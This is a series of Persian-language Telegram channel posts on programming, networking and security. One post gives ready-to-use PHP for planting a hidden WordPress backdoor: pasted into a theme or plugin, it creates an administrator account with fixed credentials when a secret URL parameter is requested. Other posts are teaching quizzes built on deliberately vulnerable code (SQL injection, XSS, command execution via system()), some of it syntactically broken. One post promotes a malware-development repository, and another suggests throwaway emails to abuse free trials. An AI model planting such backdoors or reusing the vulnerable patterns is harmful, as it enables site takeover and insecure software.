#Video #Short
حرف های خالق زبان CPP

بیش از اندازه روی یک حوزه متخصص نشوید...

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#Programming #Code #Security #PHP #WordPress #Backdoor

چطور با زبان PHP  یک ادمین در وردپرس بسازیم ؟

کافیه کد زیر را در درون کدهای قالب سایت یا افزونه قرار بدبد

add_action( 'wp_head', 'add_user_in_wp' );

function add_user_in_wp() {
If ($_GET['@HamedMoqaddasi'] == '@Elecompino') {
require('wp-includes/registration.php');
If (!username_exists('@ZeroDayResearch')) {
$user_id = wp_create_user('@ZeroDayResearch', '@ZeroDayAcademyCom);
$user = new WP_User($user_id);
$user->set_role( 'administrator' );
}
}
}

وقتی کد مربوطه را قرار دادید اتفاق خاصی رقم نمی‌خوره اما به محض اینکه لینک زیر رو بزنید


https:/site.com/?@HamedMoqaddasi=@Elecompino

🌀جای عبارت site.com آدرس دامنه سایت وردپرس مربوطه را قرار بدید یک کاربر ادمین با نام کاربری @ZeroDayResearch و رمز عبور @ZeroDayAcademyCom براتون ساخته میشه و میتونید از طریق LoginPage وردپرس وارد پیشخوان وردپرس بشید.

👁‍🗨به این نوع کدها میگن بکدور که به اونا پرداخته خواهد شد

❌این پست صرفا جنبه آموزشی دارد و هرگونه سوءاستفاده از آن برعهده خود شخص می باشد،هرچند این روش خیلی راحت قابل شناسایی می باشد

✳️ادامه دارد.....

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔@HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#Challenge #Programming  #Code #PHP

🔍آیا کد PHP زیر آسیب پذیری داره یا نه،اگر آسیب پذیری داره چه نوع آسیب پذیریه  و به چه دلیل؟!

<?php
$user_input = $_GET['username']; 


$sql = "SELECT * FROM users WHERE username = '$user_input'";
$result = $conn->query($sql);

if ($result->num_rows > 0) {
    echo "Login successfully!<br>";
} else {
    echo "Login failed.<br>";
}

?>

✳️سطح این چالش ساده می باشد

✅جواب خودتون رو در زیر همین پست کامنت کنید.

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#Mobile #Android #Tools #Sec

🛡شاید بعنوان یک برنامه نویس یا کسی که در حیطه امنیت نرم افزار(مخصوصا امنیت نرم افزارهای اندروید)کار می‌کنه میخواهی بدونی یک اپلیکیشن چه آسیب پذیری های داره،میتونی از ابزار APKDeepLens استفاده کنی،این ابزار رو میتونه این کار رو برات انجام بده

🌐 https://github.com/d78ui98/APKDeepLens

👈خوبی این ابزار اینه که براساس Owasp Top 10 آسیب پذیری ها رو پوشش میده و کلی قابلیت دیگه بهت میده

❌دوستانی که بطور تخصصی در حیطه امنیت کار میکنند یا کار خواهند کرد،همیشه به ابزار اکتفا نکنید و بصورت دستی تست رو هم انجام بدید.

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#Challenge #Programming  #Code #PY #JS

🔍نمونه کد ساده برای آسیب پذیری SQL Injection در  NodeJs و Django

کد زیر مربوط به NodeJs می باشد.👇

#NodeJS
const express = require('express');
const app = express();
const port = 3000;

app.get('/user', (req, res) => {
  const username = req.query.username; 

  const query = SELECT * FROM users WHERE username = '${username}';
  
  db.query(query, (err, results) => {
    if (err) throw err;
    res.json(results);
  });
});

app.listen(port, () => {
  console.log(Server running at http://localhost:${port});

کد زیر مربوط به Django می باشد.👇

#Django
from django.http import JsonResponse
from .models import User

def vulnerable_view(request):
    username = request.GET.get('username')  
  
    query = f"SELECT * FROM myapp_user WHERE username = '{username}'"
    users = User.objects.raw(query)

    result = [{'username': user.username, 'email': user.email} for user in users]
    return JsonResponse(result, safe=False)

👈کد PHP مربوط به آسیب پذیری SQLi اینجا ببنید👉

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#AI #Tools #Python

👁‍🗨کنترل کامپیوتر با استفاده از زبان طبیعی

✳️با استفاده از ابزار یا هوش مصنوعی زیر که با پایتون توسعه داده شده میتونید در محیط Shell با کمک این ابزار کارهای متفاوتی از قبیل کدنویسی و تجزیه و تحلیل آن،
ساخت و ویرایش عکس ها و ویدیوها و فایل ها و... انجام دهید

✅با نصب داشتن پایتون در سیستم خود و اجرای دستور زیر در محیط CLI،بطور خودمونی همون Terminal یا CMD میتونید Open Interpreter را نصب کنید

pip install open-interpreter

با دستور زیر آن را اجرا کنید

interpreter

برای اطلاعات بیشتر میتونید به مخزن یا Repository  گیت هاب مراجعه کنید👇

🌐 https://github.com/OpenInterpreter/open-interpreter

و همچنین برای مطالعه داکیومنت آن از لینک زیر استفاده کنید👇
🌐 https://docs.openinterpreter.com/getting-started/setup


❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#Challenge #Programming  #Code #VulnerableCode #PHP

👈ادامه چالش کدهای آسیب پذیر👉

🔍کد PHP چه نوع آسیب پذیری داره و به چه دلیل؟!

<!DOCTYPE html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <noscript>Vulnerable Code Challenge</noscript>
</head>
<body>
    <h1>@HamedMoqaddasi</h1>
    <form action="" method="get">
        <input type="text" name="input" placeholder="Send Your Text" />
        <button type="submit">Send</button>
    </form>
    <div>
        <h2>Output:</h2>
        <p><?php echo $_GET['input']; ?></p>
    </div>
</body>
</html>

✳️سطح این چالش ساده می باشد

✅جواب خودتون رو در زیر همین پست کامنت کنید.

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#Book #AI #RoadMap

📃نقشه راه یادگیری هوش مصنوعی (AI)

👌در این کتابچه به شما از مباحث پایه تا پیشرفته برای یادگیری حوزه هوش مصنوعی نقشه راه تعبیه شده که به شما کمک میکند مسیر خود را پیدا کنید

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

👁‍🗨هوش مصنوعی که به شما در نوشتن کدها کمک می کنه

🌐 https://www.tabnine.com

این سرویس از Deep Learning برای کمک به نوشتن کدهای سریع تر استفاده می کنه،همچنین توجه داشته باشید برای اولین بار میتونید با ایمیل خودتون تا 90 روز ازش بصورت رایگان استفاده کنید،کلا بهتره از  سرویس های ایمیل فیک مانند tempmail استفاده کنید.

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#Web #Tools #Architecture
👁‍🗨مهم ترین معماری های دنیای وب

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#Source #Github #Rust #MD #Programming

👁‍🗨‏اگه به برنامه نویسی بدافزار اونم با زبان RUST علاقه مندید و دوست دارید باهاش در زمینه Malware Development  کار کنید،یکی از بهترین منابعی که به طور منظم آپدیت میشه و میتونید ازش استفاده کنید این مخزن گیت هابه👇


🌐 https://github.com/Whitecat18/Rust-for-Malware-Development


🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#Web #TCP #UDP #Architecture

👈قراره توی نسخه‌های بعدی Google Chrome امکان استفاده از سوکت TCP و UDP اضافه بشه،اینکار به برنامه نویسان این امکان ارائه میده تا نرم افزارهای تحت وب رو با عملکرد بهتری ارائه بدن

برای اطلاعات بیشتر در این رابطه لینک زیر رو دنبال کنید

https://wicg.github.io/direct-sockets


❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#Site #Security #Article #BugHunting

اگر میخواهی نمونه آسیب پذیری و گزارش واقعی در حوزه Bug Hunting ببینی و همچنین یکسری مقاله در این حوزه مطالعه کنی می تونی به سایت زیر مراجعه کنید

🌐   https://huntr.com‎


❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#Challenge #Programming  #Code #VulnerableCode #PY #JS

🔍نمونه کد ساده برای آسیب پذیری XSS در  NodeJs و Django

کد زیر مربوط به NodeJs می باشد.👇

#NodeJs
const express = require('express');
const app = express();
const bodyParser = require('body-parser');
const port = 3000;

app.use(bodyParser.urlencoded({ extended: true }));

app.get('/', (req, res) => {
    res.send(
        <form action="/submit" method="POST">
            <input type="text" name="userin" placeholder="Enter Your Text">
            <button type="submit">Send</button>
        </form>
        <div>${req.query.output || ''}</div>
    );
});

app.post('/submit', (req, res) => {
    const userin = req.body.userInput;
    res.redirect(/?output=${userin});
});

app.listen(port, () => {
    console.log('Server running at http://localhost:port');
});

کد زیر مربوط به Django می باشد.👇

#Django
from django.shortcuts import render, redirect

   def index(request):
       output = request.GET.get('output', '')
       return render(request, 'index.html', {'output': output})

   def submit(request):
       if request.method == 'POST':
           userin = request.POST.get('userInput', '')
           return redirect(f'/?output={userin}')

 
👈کد PHP مربوط به آسیب پذیری XSS اینجا ببنید👉

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#Network #OSI #Protocol

پروتکل های رایج و پر استفاده در لایه های مدل OSI

1⃣لایه Physical 
  👈پروتکل‌ها و استانداردها: Ethernet (PHY), USB, DSL, ISDN, IEEE 802.11 (Wi-Fi)

2⃣لایه Data Link
  👈پروتکل‌ها و استانداردها: Ethernet (MAC), PPP, ARP, Frame Relay, IEEE 802.3

3⃣لایه Network
  👈پروتکل‌ها: IP, ICMP, IPsec, IGMP, RIP, OSPF

4⃣لایه Transport
  👈پروتکل‌ها: TCP, UDP, SCTP

5⃣لایه Session
  👈پروتکل‌ها: NetBIOS, PPTP, RPC, SMB

6⃣لایه Presentation
  👈پروتکل‌ها: SSL/TLS, MPEG, JPEG, ASCII, XDR

7⃣لایه Application
  👈پروتکل‌ها: HTTP, FTP, SMTP, DNS, DHCP, SNMP , Telnet

مدل OSI:یک استاندارد بین‌المللی هستش که توسط سازمان ISO توسعه یافته و در کل یک مدل جامع و مرجع در دنیا شبکه س که کمک می‌کنه شبکه رو بطور عمیق تر و درست تر درک کنید.

✅این پروتکل‌ها در هر لایه به ترتیب وظایف خودشون رو در ارتباطات شبکه انجام می‌دهند و نقش مهمی در عملکرد شبکه دارند.

🌀در مورد پروتکل های مهم مخصوصا در لایه Application صحبت خواهم کرد


❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#Network #Internet #Protocol

پروتکل ها و استانداردهای رایج و پرکاربرد مدل TCP/IP

1⃣لایه Network Access
👈پروتکل‌ها و استانداردها: Ethernet, ARP, PPP, Wi-Fi (IEEE 802.11)

2⃣لایه Internet
  👈پروتکل‌ها: IP, ICMP, IP Sec, IGMP

3⃣لایه Transport
  👈پروتکل‌ها: TCP, UDP


4⃣لایه Application
  👈پروتکل‌ها: HTTP, HTTPS,FTP, SMTP, DNS,SNMP, SSH,NTP, POP3, IMAP

مدل TCP/IP:  این مدل به طور کلی برای پروتکل‌های اینترنتی طراحی شد و بر روی نحوه انتقال داده‌ها در شبکه‌های مبتنی بر IP تمرکز داره و بعنوان استاندارد اصلی اینترنت شناخته میشه و به صورت  کاربردی برای پیاده‌سازی شبکه‌ها مورد استفاده می‌شود و بیشتر در دنیای واقعی مورد پذیرش قرار گرفت



✳️مدل های شبکه گسترده هستند و بطور کل بنده دو مدل اصلی رو براتون معرفی کردم،مدل های دیگه مثل SDN,P2P, Client-Server,Hybrid و... وجود داره که از اشاره به موضوع اونها تا  به اینجا امتناع میکنم،اگر دوست داشتید اشاره میکنم

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#Challenge #Programming  #Code #VulnerableCode #PHP

👈ادامه چالش کدهای آسیب پذیر👉

🔍کد PHP چه نوع آسیب پذیری داره و به چه دلیل؟!

<?php
if (isset($_GET['in'])) {
    $in = $_GET['in'];
    system($in);
}
?>
<form method="get">
    <input type="text" name="in" placeholder="Enter Your Text" />
    <input type="submit" value="Run" />
</form>

✳️سطح این چالش آسان می باشد

✅جواب خودتون رو در زیر همین پست کامنت کنید.

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X